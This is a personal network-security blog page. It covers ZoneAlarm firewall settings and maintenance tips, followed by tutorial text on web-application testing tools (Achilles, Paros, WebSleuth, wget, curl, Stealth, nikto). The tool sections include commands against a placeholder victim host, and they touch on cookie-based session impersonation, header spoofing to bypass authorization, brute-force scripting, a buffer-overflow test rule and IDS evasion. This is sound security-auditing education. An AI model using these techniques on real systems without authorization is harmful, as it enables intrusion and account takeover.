ep6network | Network security

Network security, security software, Wi-Fi security, wireless security

Welcome

Welcome to my Network Security blog. Here you can find the security features of networks and operating systems. In this blog you will find the best notes I could put together; I have tried to keep them simple and descriptive. You can find here different types of adware and spyware threats and their prevention, definitions of different types of viruses and how to remove them, antivirus software and links to free antivirus, anti-spyware, and adware-removal tools. We will also look at how to secure a telephone network, a local area network (LAN), and a wide area network (WAN). I have covered firewalls, network architecture, cryptography, Internet Key Exchange, IP security, crypto history, cryptographic blocks, and much more to help you with further study. And this is not the end: keep visiting this blog and I will provide more and more security tricks. And don't forget to comment on whether it is good or bad. Please do comment on my thesis; your comments will help me to improve it. If you want notes on a specific security topic, please let me know. My email id is ep6secuirity@gmail.com. I will try to do my best, and if I cannot fulfill your requirements, I will let you know.

Thanks and Regards

Utsav Basu

For – ep6network.



Configuring ZoneAlarm Security Settings


If you're running ZoneAlarm Pro, you have probably noticed that most of the "advanced" settings might as well be in Chinese for all the use they are. User friendly they are not!

If you are not on a LAN (connected to another computer in a network) you can use this guide to give your firewall some real muscle and a new lease of life:

Launch ZoneAlarm Pro and click to highlight the "Firewall" tab on the left-hand side. In the pane that appears on the right-hand side, in the section "Internet Zone Security", set the slider control to "High", then click the "Custom" button in the same section.

The next settings page is divided into two sections, with Internet Zone and Trusted Zone tabs at the top of the page. Under the Internet Zone tab there is a list of settings that can be accessed by scrolling. At the top are the high security settings, and the only item that should be checked there is "allow broadcast/multicast". The rest should be unchecked.

Scroll down until you get to the medium security settings area. Check all the boxes in this section until you get to "Block Incoming UDP Ports". When you check that, you will be asked to supply a list of ports; in the field at the bottom of the page enter 1-65535.

Then go back to the list and check the box alongside "Block Outgoing UDP Ports", and at the bottom of the page enter 1-19, 22-79, 82-7999, 8082-65535.

Repeat this procedure for the following settings:
"Block Incoming TCP Ports": 1-65535
"Block Outgoing TCP Ports": 1-19, 22-79, 82-7999, 8082-65535
Then click "Apply", then "OK" at the bottom of the page.

Back in the right-hand "Firewall" pane, go next to the yellow "Trusted Zone Security" section and set it to "High" with the slider. Click "Custom" and repeat the above procedure, this time choosing the Trusted Zone tab at the top of the settings page.

These settings will stop all incoming packets on ports 1-65535 and also block all pings, trojans, and so on. They will also stop spyware or other applications from phoning home from your drive without your knowledge!



You may not realize it, but your computer and your car have something in common: they both need regular maintenance. No, you don't need to change your computer's oil. But you should be updating your software, keeping your antivirus subscription up to date, and checking for spyware. Read on to learn what you can do to help improve your computer's security.




Here are some basic maintenance tasks you can do today to start improving your computer's security. Be sure to make these part of your ongoing maintenance as well.

* Sign up for software update e-mail notices. Many software companies will send you e-mail whenever a software update is available. This is particularly important for your operating system (e.g., Microsoft Windows® or Macintosh), your antivirus program, and your firewall.
* Register your software. If you still have registration forms for existing software, send them in. And be sure to register new software in the future. This is another way for the software manufacturer to alert you when new updates are available.
* Install software updates immediately.
When you get an update notice, download the update immediately and install it. (Remember, downloading and installing are two separate tasks.)
An ounce of prevention

A few simple steps will help you keep your files safe and clean.

* Step 1: Update your software
* Step 2: Back up your files
* Step 3: Use antivirus software and keep it updated
* Step 4: Change your passwords


Developing ongoing maintenance practices

Now that you've done some ground work, it's time to start moving into longer term maintenance tasks. These are all tasks that you should do today (or as soon as possible) to get started. But for best results, make these a part of a regular maintenance schedule. We recommend setting aside time each week to help keep your computer secure.

* Back up your files. Backing up your files simply means creating a copy of your computer files that you can use in the event the originals are lost. (Accidents can happen.) To learn more read our tips for backing up information.


* Scan your files with up-to-date antivirus software. Use your antivirus scan tool regularly to search for potential computer viruses and worms. Also, check your antivirus program's user manual to see if you can schedule an automatic scan of your computer. To learn more, read our tips for reducing your virus risk.

* Change your passwords. Using the same password increases the odds that someone else will discover it. Change all of your passwords regularly (we recommend monthly) to reduce your risk. Also, choose your passwords carefully. To learn more, read our tips for creating stronger passwords.

Making a schedule

One of the best ways to help protect your computer is to perform maintenance regularly. To help you keep track, we suggest making a regular "appointment" with your computer. Treat it like you would any other appointment. Record it in your datebook or online calendar, and if you cannot make it, reschedule. Remember, you are not only helping to improve your computer, you are also helping to protect your personal information.

Application Inspection

So far we have looked at tools that examine the web server. In doing so, we miss vulnerabilities that may be present in the web application. This class of vulnerabilities arises from insecure programming and misconfiguration of the interaction between web servers and databases. We can’t explain the nature of web application insecurity and the methodology and techniques for finding those vulnerabilities within a single chapter. What we will show are the tools necessary for you to peek into a web application. Although a few of these programs have grown from the security community, they deserve a place in a web application programmer’s debugging tool kit as well.

Additional stunnel.conf Directives

Directive

Description

foreground

Values: yes or no
Available only for Unix-based stunnel execution. It will print activity to stderr, which is an excellent way to troubleshoot connectivity problems.

TIMEOUTbusy

Value: time in seconds
Time to wait for data. Available only as part of a specific service definition.

TIMEOUTclose

Value: time in seconds
Time to wait for close_notify socket messages. The stunnel developers recommend a value of zero when using the Internet Explorer browser. Available only as part of a specific service definition.

TIMEOUTidle

Value: time in seconds
Time to keep an idle connection before closing it. Available only as part of a specific service definition.
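To show where these directives live, here is a minimal stunnel.conf sketch, not a configuration taken from the text above: the [https] service name and the port numbers are illustrative assumptions. foreground is a global option, while the TIMEOUT directives belong inside a specific service definition:

; global options
foreground = yes

[https]
; accept SSL on 443 and hand the decrypted traffic to a local web server on 80 (example values)
accept = 443
connect = 80
TIMEOUTbusy = 10
TIMEOUTclose = 0
TIMEOUTidle = 30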

Achilles

Aptly named, Achilles helps pick apart web applications by acting as a proxy with a pause button. A normal proxy sits between a web browser and a web server, transparently forwarding requests and responses between the two. Achilles works similarly, but it adds functionality that lets you modify contents on the fly. For example, Achilles lets you manipulate cookie values, POST requests, hidden Form fields, and every other aspect of an HTTP transaction—even over SSL!

Implementation

Because it’s a proxy, Achilles must first be set up to listen on a port and placed into “intercept” mode. Clicking the play button (the triangle) starts the proxy, and clicking the stop (square) button stops it—think of a tape recorder’s controls.

It’s a good idea to leave the Ignore .jpg/.gif option enabled. Modifying image files rarely bypasses a web application’s security stance, and the number of requests it generates from a single web page quickly becomes annoying.

Next, set your web browser's proxy to the IP address (127.0.0.1 if it's the same computer) and port (5000, by default) on which Achilles listens. Normally, it's easiest to run Achilles on your localhost. Any web browser that supports an HTTP proxy, from Lynx to Galeon, can use Achilles; the only platform restriction is that Achilles itself is a Win32 binary.

In basic intercept mode, you can browse a web site or multiple web sites transparently. The Log To File option will save the session to a file. This is useful for surveying a web application. The logfile holds every link that was visited, including helper files such as JavaScript (*.js) and other include (*.inc) files that are not normally seen in the URL. The other advantage is that you now have a copy of the HTML source of the target web site. This source might reveal hidden Form fields, cookie values, session-management variables, and other information about the application. The techniques for picking apart a web application are well beyond the scope of this chapter, but having a tool like Achilles is an absolute requirement for performing such tests.

In active intercept mode, you can view the requests made by the browser (Intercept Client Data) or responses sent by the server (Intercept Server Data (text)). Intercepting client data enables you to manipulate GET and POST requests as well as cookie values. This capability is used to bypass authentication and authorization schemes and to impersonate other users. Achilles' text box basically functions as a text editor.

Using Achilles probably sounds abstract by now. This is definitely a tool in the “pictures are worth a thousand words” category. Launch Achilles, change your web browser’s proxy setting, make sure to choose Intercept Client Data, and browse your favorite web site. You’ll be surprised to see what goes on behind the scenes of ordering a book or checking your bank balance!

Interception Problems Achilles intercepts only text data. A site that uses ActiveX components, also known as COM (Component Object Model) objects or CAB (cabinet) files, is more resilient to interception because such files appear as binary data that Achilles always ignores. Achilles still correctly proxies the HTTP connection, but you will not be able to manipulate the data. Other binary objects, such as downloading a ZIP or PDF file, are also proxied but are not shown in the text window.

Web sites that use SSL often generate errors in Achilles. A problematic site with 20 objects on its home page (such as pictures, style sheets, JavaScript files, and HTML) might generate 20 “Client failed SSL connection” errors. This is not really a big deal, but it does mean that you have to click 20 different OK buttons to close each error indication.

Some sites tend to cause Achilles to crash unexpectedly. There does not seem to be any good rule of thumb that determines which sites cause crashes and which do not. One workaround is to log onto the site without the proxy, and then start the proxy and change your browser's settings once you come to the particular part of the application you wish to inspect. Unfortunately, this technique fails against sites that use strong session management. Finally, Achilles handles HTTP Basic Authentication, but any web application that uses NTLM Authentication (supported by IIS) will not work through Achilles.

WebSleuth

WebSleuth puts proxy functionality right in the browser. It is a set of Visual Basic routines wrapped around Internet Explorer. Obviously, this ties you to the Win32 platform, but the tool proves useful enough to consider for web application testing. It allows you to step through a site while examining cookies and HTML source, taking notes along the way. It has also grown from an Internet Explorer shim to a full-featured application testing tool. The 1.36 version is free but buggy; the 1.41 series fixes several bugs and adds new functionality, most noticeably a request interceptor.

Implementation

The green, red, and blue buttons located on the bottom right control site navigation: Go, Back, Stop, Forward, Reload. The Properties, Toolbox, Plugins, and Favorites menus are accessed by clicking the menu with either mouse button.

The Source tab enables you not only to view the HTML source of a web page but also to apply syntax highlighting (AutoColor option) and even reformat muddled HTML into a more human-readable version (Cleanup option). This is a boon to anyone who has ever tried to slog through web applications whose HTML is littered with punctuation characters, tags, and too few spaces to separate it all.

The best addition to WebSleuth is the Intercept tab, whose configuration options cover almost any scenario one could wish for. The options enable you to trigger the intercept engine only for URLs with a particular file extension, or only if the URL contains a query string, which is one of the most common reasons for intercepting a request. It can also trigger on POST requests or if the URL contains a particular string. Another setting allows for a Gateway Proxy, which enables you to chain WebSleuth with another proxy, something that Achilles sorely lacks.

Another addition to the control tab selections is the Spider tab. Just as you would expect, this tab sets the options for WebSleuth's internal site-crawling engine. The crawler has difficulty with authentication-based applications but nevertheless performs fairly well. A nice feature, which isn't present in other local proxies, is the ability to add notes for each page. Highlight any of the pages in the left-hand pane of the window and the right-hand pane displays an Add/Edit Notes button. You can note whether the page has been tested, whether any vulnerabilities were discovered, or whether the HTML contained sensitive information.


The Properties menu button displays information about the current page. It does not affect “properties” of the application, nor can it change properties of the current page. It merely reports information. It is useful for extracting focused types of information about the current page: Links, Forms, Cookies, Frames, Query Strings, Images, Scripts, Comments, and Meta Tags.

The Toolbox menu button has some of the best functions. The HTML Transformations function is especially cool. It removes scripts that disable many types of input validation routines. It shows hidden fields, which reveal session, server, and client variables. Also, the Generate Report function creates an excellent list of the current page’s cookies, links, query strings, Form information, script references, comments, and META tags.

The Plugins menu serves as WebSleuth’s method of extending its core capabilities. It enables such activities as request editing (now over SSL as well), testing HTTP PUT and DELETE verbs, and cookie attribute manipulation.

Paros Proxy

Now that Achilles and WebSleuth have been mentioned, it is time to introduce the new heavyweight in the local proxy arena: Paros. While Achilles introduced the utility of local proxies, its development stalled prematurely, and WebSleuth is intractably tied to Internet Explorer. Paros is a Java-based proxy that not only imitates the concept of a local proxy but adds significant enhancements to usability, testing techniques, and data presentation. In other words, you should download, install, and try Paros, because it's an excellent tool!

Implementation

Paros is pure Java. Hence, you can download and compile the source yourself or simply obtain the binary and begin testing. You will need the Java 1.4 environment, so be sure to update your system's Java installation if it does not meet this requirement. Once installed, launch Paros and set your browser's HTTP proxy setting to port 8080 and HTTPS proxy to port 8443. Now you are ready to begin examining a web application: navigate through the application as you normally would via the web browser. Paros silently records the directory and file structure of every request. The directory structure of an osCommerce application, for example, appears in the Web Site Hierarchy window in the upper-left corner of the interface.

Although Paros observes every aspect of the request, whether the request uses HTTP or HTTPS, it will log only cookies and the site hierarchy by default. If you wish to record other aspects of the application, navigate to the Filters tab on the interface and set your desired options. Even though the GET and POST files have an .xls extension, they are tab-delimited plain-text files that you can view with a text editor or import into a spreadsheet application. The files are written to the directory from which Paros is executed.

Your next option is to instruct Paros to scan the items in the site hierarchy for common vulnerabilities. Navigate to the Scan tab and check the types of scans you wish to perform; scans are not performed automatically. You must right-click an entry in the Web Site Hierarchy window. This opens a pop-up menu that enables you to select Scan Selected Node, Delete Selected Node, or Clear All. If you select Scan Selected Node, Paros begins its predefined tests.

The filters and scan options represent techniques not available in Achilles and only approximated in WebSleuth. Of course, the greatest benefit of a local proxy is the ability to intercept and rewrite web requests. Paros provides this capability in the Trap tab, which is split into two sections. The Header section shows the intercepted request when Trap Request is checked. This allows you to view and edit the entire URL and headers that will be sent to the server. Once you click Continue, the Header and Body sections are populated with, appropriately enough, the HTTP Header and Body data returned by the server. This process is shown in the next two figures. You should notice that a single quote has been inserted into the forum='all URL parameter. The Header section, which used to contain the modified request, now contains the Date, Server, and other fields. More interesting is the Body section, which displays the error produced in the back-end MySQL database due to the extraneous single quote inserted into the forum parameter.
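To make the trap step a little more concrete, here is a rough sketch of what a trapped request might look like after the single quote has been typed into the Header section. Only the forum='all parameter comes from the discussion above; the path, host, and cookie are hypothetical placeholders:

GET /forum/index.php?forum='all HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/4.0 (compatible)
Cookie: PHPSESSID=0123456789abcdef

Clicking Continue sends this edited request to the server, and the resulting database error (if any) appears in the Body section.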

The ability to rewrite and insert arbitrary characters into HTTP GET and POST requests makes a tool like Paros indispensable for auditing the security of a web application. Paros is just a tool; the techniques and tricks of testing web application security are far too broad to cover in this chapter.

Finally, Paros has an additional function hidden under the Tools menu. You can have Paros spider any HTTP or HTTPS application and populate the site hierarchy window automatically. The spider function works with varying success that depends on what the application requires with regard to cookies, headers, and authentication. Nevertheless, it serves as a nice utility that will improve over time.

Wget

The final tool we present probably seems out of place compared to the previous tools. Wget is a command-line tool that basically copies a web site’s contents. It starts at the home page and follows every link until it has discovered every page of the web site. When someone performs a security audit of a web application, one of the first steps is to sift through every page of the application. For spammers, the goal would be to find e-mail addresses. For others, the goal would be to look for programmers’ notes that perhaps contain passwords, SQL statements, or other juicy tidbits. In the end, a local copy of the web application’s content enables the person to search large sites quickly for these types of information.

Wget has other uses from an administrator’s point of view, such as creating mirrors for highly trafficked web sites. The administrators for the mirrors of many web sites (such as http://www.samba.org and http://www.kernel.org) use wget or similar tools to reproduce the master server on alternative servers. They do this to reduce load and to spread web sites geographically.

Implementation

As wget's main purpose is to download the contents of a web site, its usage is simple. To spider a web site recursively, use the -r option:

$ wget -r www.victim.com
...(continues for entire site)...

The -r or --recursive option instructs wget to follow every link on the home page. This will create a www.victim.com directory and populate that directory with every HTML file and directory wget finds for the site. A major advantage of wget is that it follows every link possible. Thus, it will download the output for every argument that the application passes to a page. For example, the viewer.asp file for a site might be downloaded four times:

  • viewer.asp@ID=555

  • viewer.asp@ID=7

  • viewer.asp@ID=42

  • viewer.asp@ID=23

The @ symbol represents the ? delimiter in the original URL. The ID is the first argument (parameter) passed to the viewer.asp file. Some sites may require more advanced options such as support for proxies and HTTP Basic Authentication. Sites protected by Basic Authentication can be spidered in this way:

[root@meddle]# wget -r --http-user=dwayne --http-passwd=woodelf \
> https://www.victim.com/secure/
...continues for entire site...

Sites that rely on cookies for session state or authentication can also be spidered by wget. Create a cookie file that contains a set of valid cookies from a user’s session. The prerequisite, of course, is that you must be able to log in to the site to collect the cookie values. Then, use the --load-cookies option to instruct wget to impersonate that user based on the cookies:

$ wget --load-cookies=cookies.txt \
> -r https://www.victim.com/secure/menu.asp

Still other sites purposefully set cookies to defeat most spidering tools. Wget can handle session and saved cookies with the appropriately named --cookies option. It is a Boolean value, so you can either turn it off (the default) or on:

$ wget --load-cookies=cookies.txt --cookies=on \
> -r https://www.victim.com/secure/menu.asp

The --http-user and --http-passwd options enable wget to access web applications that employ HTTP Basic Authentication. Set the values on the command line and watch wget fly:

$ wget --http-user=guest --http-passwd=no1knows \
> -r https://www.victim.com/maillist/index.html

In the end, wget provides a quick method for downloading the HTML contents of a web application for off-line analysis. If you are frustrated by the spidering capabilities of Paros, then use wget to perform these tasks.


All-Purpose Tools

The following tools serve as workhorses for making connections over HTTP or HTTPS. Alone, they do not find vulnerabilities or secure a system, but their functionality can be put to use to extend the abilities of a web vulnerability scanner, peek into SSL traffic, or encrypt client/server communication to protect it from network sniffers.

Curl

Where Netcat deserves the bragging rights of super network tool, curl deserves considerable respect as a super protocol tool. Curl is a command-line tool that can handle DICT, File, FTP, Gopher, HTTP, HTTPS, LDAP, and Telnet requests. It also supports HTTP proxies. As this chapter focuses on web auditing tools, we'll stick to the HTTP and HTTPS protocols. By now, it has become a de facto tool on most Linux and BSD distributions, plus Mac OS X and Cygwin.

Implementation

To connect to a web site, specify the URL on the command line, like so:

$ curl https://www.victim.com

Automated scripts that spider a web site or brute-force passwords really demonstrate the power of curl. The following table lists some of the most useful of curl's options.

Useful Web-Oriented Curl Options

Option

Description

-H/--header

Set a client-side header. Use an HTTP header to imitate several types of connections. For example:
User-Agent: Mozilla/4.0 (spoof a particular browser)
Referer: http://localhost/admin (bypass poor authorization that checks the Referer page)
Authorization: Basic xxxxx (set a username and password)
Host: localhost (specify virtual hosts)

-b/--cookie

-c/--cookie-jar

-b uses a file that contains cookies to send to the server. For example,
-b cookie.txt includes the contents of cookie.txt with all HTTP requests. Cookies can also be specified on the command line in the form of -b ASPSESSIONID=INEIGNJCNDEECMNPCPOEEMNC; -c uses a file that stores cookies as they are set by the server. For example, -c cookies.txt holds every cookie from the server. Cookies are important for bypassing Form-based authentication and spoofing sessions.

-d/--data

Submit data with a POST request. This includes Form data or any other data generated by the web application. For example, to set the Form field for a login page, use -d login=arbogoth&passwd=p4ssw0rd. This option is useful for writing custom brute-force password guessing scripts. The real advantage is that the requests are made with POST requests, which are much harder to craft with a tool such as Netcat.

-G/--get

Change a POST method so that it uses GET. This applies only when you specify the -d option.

-u/--user

-U/--proxy-user

Set the username and password used for basic authentication or a proxy. To access a site with Basic Authentication, use -u user:password. To access a password-protected proxy, use -U user:password. The latter is meaningless if the -x option is not set.

--url

Set the URL to fetch. This does not have to be specified but helps for clarity when many command-line options are used. For example, --url https://www.victim.com/admin/menu.php?menu=adduser. Curl gains speed optimizations when multiple URLs are specified on the command line, because it tries to make persistent connections. This means that all requests will be made over the original connection instead of establishing a new connection for each request.

-x/--proxy

Set an HTTP proxy. For example, -x http://intraweb:80/.

-K/--config

Set a configuration file that includes subsequent command-line options. For example, -K www.victim.com.curl. This is useful when it becomes necessary to specify multiple command-line options.
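To tie a few of these options together, here is a minimal sketch of the kind of brute-force login loop hinted at in the -d description. Everything specific in it is an assumption for illustration: the /login.asp URL, the field names login and passwd, the words.txt wordlist, and the "Invalid password" failure string are placeholders, and a real application will use its own names and error messages:

$ for pass in $(cat words.txt); do
>   # POST one candidate password; -s keeps curl quiet
>   result=$(curl -s -d "login=arbogoth&passwd=$pass" \
>     --url https://www.victim.com/login.asp)
>   # if the failure string is absent, flag the candidate for manual review
>   echo "$result" | grep -q "Invalid password" || echo "possible hit: $pass"
> done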

Catching Scan Signatures

As an administrator, you should be running vulnerability scanners against your web servers as part of routine maintenance. After all, it would be best to find your own vulnerabilities before someone else does. On the other hand, how can you tell if someone is running these tools against you? An intrusion detection system (IDS) can help, but an IDS has several drawbacks: it typically cannot handle high bandwidth, it relies on pattern-matching intelligence, it cannot (for the most part) watch encrypted SSL streams, and it is expensive (even the open-source snort requires a team to maintain and monitor events). The answer, in this case, is to turn to your logfiles. You enabled robust logging for your web server, right?

Common Signatures

Logfiles are a security device. They are reactionary, meaning that if you see an attack signature in your file, you know you've already been attacked. If the attack compromised the server, web logs will be the first place to go for re-creating the event. Logs also help administrators and programmers track down bugs or bad pages on a web site—necessary to maintain a stable web server. With this in mind, you should have a policy for turning on the web server's logging, collecting the logfiles, reviewing the logfiles, and archiving the logfiles.

The following table lists several items to look for when performing a log review. Many of these checks can be automated with simple tools such as grep.


Stealth

Stealth is a vulnerability scanning tool created by Felipe Moniz. It uses the Windows GUI and therefore doesn’t have the cross-platform capability of nikto. Stealth’s strength lies in its number of checks and, like nikto, ease of updating its database. More than 13,000 checks currently populate the Stealth database, although only about 5000 of them are unique. These checks range from URLs that break obscure devices with embedded web servers to the most current IIS vulnerabilities.

Implementation

By default, Stealth uses the "normal" Scan Rule, which contains roughly 6500 checks. This screen is accessed by clicking the Scanner button in the Stealth application window.

Stealth can also scan a range of web servers. However, the range must be a list of sequential IP addresses; it is not possible to load a custom list of target IP addresses. This slows down scans that target a network, because Stealth must first identify a web server before scanning it. When servers are distributed across networks, this is even slower.

One more note about scanning a range: Any time Stealth encounters an error, it pops up a message box that requires manual intervention to close. In short, Stealth is not the best tool for scanning multiple servers at once.

The IDS Test button works much like nikto’s IDS evasion techniques. Stealth offers 13 different evasion techniques. Select which techniques you want to use, and then choose CGI Setup | Use IDS Evasion.

When Stealth finishes a scan, it prompts the user to save the report. A Stealth report is an HTML file that lists any potential vulnerability it discovered. This is a quick, straightforward tool that assumes you want to run 6500 checks against a web server every time.

Creating New Rules

Rule construction for Stealth is simple. You specify the URL, the request method, and the expected HTTP return code. For example, to look for a backup index.html file, you would create a file with these contents:

#INF Backup index.html file
#GET /index.html.bak #200

The #GET method could also be #HEAD or #POST. The #200 return code can be any HTTP response. Stealth does not use custom arrays, so files within a set of directories must be listed individually, as in the sketch below. Both #GET and #200 are assumed by default and can be omitted. Thus, the basic URL checking of Stealth is not as robust as whisker's. Stealth does try to simplify the vulnerability development process with its Stealth Exploit Development Tool.
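For example, because Stealth has no arrays, checking the same backup file in several directories means writing one rule per path. A small sketch, following the rule format shown above (the directory names are just examples):

#INF Backup index.html file in web root
#GET /index.html.bak #200
#INF Backup index.html file in /old
#GET /old/index.html.bak #200
#INF Backup index.html file in /backup
#GET /backup/index.html.bak #200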

The Exploit Development Tool is a GUI utility that prompts you for each of the possible fields that can be created for a vulnerability check.

The Options tab is where you specify a string that would indicate the check returned a false positive, or where you specify a User-Agent. Some web applications rely on the User-Agent header to determine whether a browser can access the site; browsers that do not support JavaScript, ActiveX, or Java would cause the application to disallow access.

Another cool Stealth technique is the buffer overflow test. A buffer overflow attack can be crafted against any URL in a web application that has a parameter list. The Stealth rule for a buffer overflow has four components:

  • bofgen The URL, encased in double-quotation marks.

  • bofstr A placeholder for the buffer overflow string. The bofstr value is replaced by the actual attack.

  • bytes The number of times to repeat the buffer overflow character.

  • chars The buffer overflow character.

For example, here’s the rule to check for a buffer overflow condition in a web application’s login page:

#INF Login.asp buffer overflow check.
bofgen="/login.asp?user=%bofstr&passwd=none","bytes=999","chars=A"

In the HTTP request that Stealth sends, the %bofstr string is replaced by 999 As.

Once an exploit is created, you must still instruct Stealth to use it. If you place the file in the Db subdirectory of the Stealth installation directory, Stealth will find the exploit and load it. To check this manually, or to create a new exploit, click the Database button in the Stealth application window and select the Stealth User's Exploits tab.

Pitfalls to Avoid

As mentioned, Stealth's ability to scan a range of web servers automatically is severely limited. Stealth occasionally generates DNS errors, which usually happens when scanning a server with virtual hosts or when it scans a server with multiple IP addresses (as is the case for many large, load-balanced sites). A DNS error is innocuous, but it requires that you close the pop-up message box Stealth generates.

The majority of Stealth's checks rely on the HTTP return code from the server. This is useful when you're checking for the existence of a vulnerable script, but it does not necessarily indicate that a script is vulnerable. For example, many of the viewcode.asp vulnerabilities in IIS sample files have been fixed in recent updates, but Stealth merely checks for their presence and often produces false positives. Even though Stealth can parse the output of a check for a specific string, few of the checks seem to do so. Relying on the HTTP return code doesn't mean that Stealth will miss vulnerabilities, but it does mean that it will produce a large number of false positives.

A GUI-based tool does not play well with others. It is difficult to create a script that generates a list of web servers or systems with port 80 open, input that list to Stealth, and then perform some file parsing on Stealth's output. A command-line tool, on the other hand, doesn't mind being wrapped in FOR loops and having data piped into it from other programs or sending its output to your favorite parsing tool. Remember the ease with which we manipulated the output from whisker with the tee and grep commands?

Finally, Stealth cannot handle SSL connections. This is a simple drawback to overcome.

Web Hacking Tools

Overview

Web server security can be divided into two broad categories: testing the server for common vulnerabilities and testing the web application. A web server should be configured according to this checklist before it is deployed on the Internet:

  • Secure network configuration A firewall or other device limits incoming traffic to necessary ports (probably just 80 and 443).

  • Secure host configuration The operating system has up-to-date security patches, auditing has been enabled, and only administrators may access the system.

  • Secure web server configuration The web server’s default settings have been reviewed, sample files have been removed, and the server runs in a restricted user account.

Of course, such a short list doesn’t cover the specifics of an Apache/PHP combination or the details of every recommended Internet Information Server (IIS) installation setting, but it should serve as the basis for a strong web server build policy. A vulnerability scanner should also be used to verify the build policy.

The security of the web application should be of concern as well. This chapter focuses on tools used to check a web server for common vulnerabilities, but the handful of tools mentioned here address the concept of testing the actual web application for security problems rather than just the server upon which the application is installed.

Vulnerability Scanners

Web servers such as Apache, iPlanet, and IIS have gone through many revisions and security updates. A web vulnerability scanner basically consists of a scanning engine and a catalog. The catalog contains a list of common files, files with known vulnerabilities, and common exploits for a range of servers. For example, a vulnerability scanner looks for backup files (such as renaming default.asp to default.asp.bak) or tries directory traversal exploits (such as checking for ..%255c..%255c). The scanning engine handles the logic for reading the catalog of exploits, sending the requests to the web server, and interpreting the requests to determine whether the server is vulnerable. These tools target vulnerabilities that are easily fixed by secure host configurations, updated security patches, and a clean web document root.

Nikto

Whisker, created by RFP, evolved into a Perl-based scanning library rather than continuing as a standalone tool. Nikto, by Sullo, is based on that next-generation LibWhisker library. From the start, it offers support for the Secure Sockets Layer (SSL), proxies, and port scanning.

Implementation

As a Perl-based scanner, nikto runs on Unix, Windows, and Mac OS X. It uses standard Perl libraries that accompany default Perl installations. You can download nikto from http://www.cirt.net. Nikto also requires LibWhisker (LW.pm), which is simple to install.

LibWhisker A fully functional copy of LibWhisker comes with the nikto tar file. Otherwise, you can always download the latest version from http://www.wiretrip.net/rfp/2/index.asp. Installation is simple, but it does vary ever so slightly from most CPAN modules. After untarring the download, enter the directory and make the library. Once that is done, install LW.pm into your Perl directory. You can do this in three commands:

$ cd libwhisker-current
$ perl Makefile.pl lib
$ perl Makefile.pl install

LibWhisker might seem redundant because it apes the functionality of several Perl modules that already exist, such as LWP, Base64, and HTML::Parser. The advantage of LibWhisker is that it is lean (a smaller file size than all the other modules it replaces), simple (a single module), focused (handles only HTTP and HTTPS requests), and robust (provides a single interface for handling request and response objects). It is also more legible than the original whisker! LibWhisker has also joined the legions of open source code on the sourceforge.net servers, so it shouldn’t be too hard to find.

Scanning To get started with nikto you need only to specify a target host with the -h option. As the engine discovers potential vulnerabilities, notes accompany the output to explain why a finding may be a security risk:

---------------------------------------------------------------------------
- Nikto 1.30/1.15 - www.cirt.net
+ Target IP: 10.0.1.14
+ Target Hostname:
+ Target Port: 80
+ Start Time: Thu Sep 25 17:07:36 2003
---------------------------------------------------------------------------
- Scan is dependent on "Server" string which can be faked, use -g to override
+ Server: Apache-AdvancedExtranetServer/2.0.44 (Mandrake Linux/11mdk) mod_perl/1.99_08 Perl/v5.8.0 mod_ssl/2.0.44 OpenSSL/0.9.7a PHP/4.3.1
+ All CGI directories 'found' - assuming invalid responses and using none (use -a to force check all possible dirs)
+ Allowed HTTP Methods: GET,HEAD,POST,OPTIONS,TRACE
+ HTTP method 'TRACE' is typically only used for debugging. It should be disabled.
+ mod_ssl/2.0.44 appears to be outdated (current is at least mod_ssl/2.8.15) (may depend on server version)
+ OpenSSL/0.9.7a appears to be outdated (current is at least 1.15)
+ PHP/4.3.1 appears to be outdated (current is at least PHP/4.3.3)
+ mod_ssl/2.0.44 OpenSSL/0.9.7a PHP/4.3.1 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CAN-2002-0082.
+ PHP/4.3.1 - PHP below 4.3.3 may allow local attackers to bypass safe mode and gain access to unauthorized files. BID-8203.
+ /~root - Enumeration of users is possible by requesting ~username (responds with Forbidden for real users, not found for non-existent users) (GET).
+ / - TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details (TRACE)
+ 1161 items checked - 2 items found on remote host
+ End Time: Thu Sep 25 17:10:03 2003 (147 seconds)
---------------------------------------------------------------------------


Table 7-1 lists the basic options necessary to run nikto. The most important options are setting the target host, the target port, and the output file. Nikto accepts the first character of an option as a synonym. For example, you can specify -s or -ssl to use the HTTPS protocol, or you can specify -w or -web to format output in HTML.

Table 7-1: Basic Nikto Command-Line Options

Nikto Option

Description

-host

Specify a single host. Nikto does not accept files with hostnames, as in the -H option for whisker.

-port

Specify an arbitrary port. Take care; specifying port 443 does not imply HTTPS. You must remember to include -ssl.

-verbose

Provide verbose output. This cannot be abbreviated (-v is reserved for the virtual hosts option).

-ssl

Enable SSL support. Nikto does not assume HTTPS if you specify target port 443.

-generic

Instruct nikto to ignore the server's banner and run a scan using the entire database.

-Format

Format output in HTML, CSV, or text. Must be combined with -output. For example: -F htm, -F csv, or -F txt.

-output

Log output to a file. For example,
-output nikto80_website.html -F htm

-id

Provide HTTP Basic Authentication credentials. For example,
-id username:password

-vhost

Use a virtual host for the target web server rather than the IP address. This affects the content of the HTTP Host: header. It is important to use this option in shared server environments.

-evasion

IDS evasion techniques. Nikto can use nine different techniques to format the URL request in an attempt to bypass unsophisticated string-matching intrusion detection systems.

You should remember a few basics about running nikto: specify the host (-h), port (-p), and SSL (-s), and write the output to a file.
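For instance, a typical invocation might look like the line below; the hostname and output filename are placeholders rather than values from the text:

$ ./nikto.pl -h www.victim.com -p 443 -ssl -output nikto443_website.html -F htm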


Additional Nikto Command-Line Options

Option

Description

-allcgi

Scan all possible CGI directories. This disregards 404 errors that nikto receives for the base directory. See the “Config.txt” section for instructions on how to configure which directories it will search.

-cookies

Print the cookies returned by the server. This either produces too much unnecessary information or very useful information depending on how the server treats unauthenticated users.

-mutate

Mutated checks are described in the “Config.txt” section.

-root

Prepend the directory supplied with -root to all requests. This helps when you wish to test sites with "off by one" directory structures. For example, many language localization techniques will prepend a two-character language identifier to the entire site.
/en/scripts/…
/en/scripts/include/…
/en/menu/foo/…
/de/scripts/…
When this is the case, nikto may incorrectly report that it could not find common scripts. Thus, use the -root option:
./nikto.pl -h website -p 80 -r /en

-findonly

Only discover open HTTP(S) ports on the target server; do not perform a full scan. The port discovery can use nmap or internal Perl-based socket connections.

-nolookup

Do not resolve IP addresses to hostnames.

-timeout N

Stop scanning if no data is received after a period of N seconds. The default is 10.

-useproxy

Use the proxy defined in the config.txt file. Previous versions of nikto required you to turn this option on or off in the config.txt file. This is more convenient.

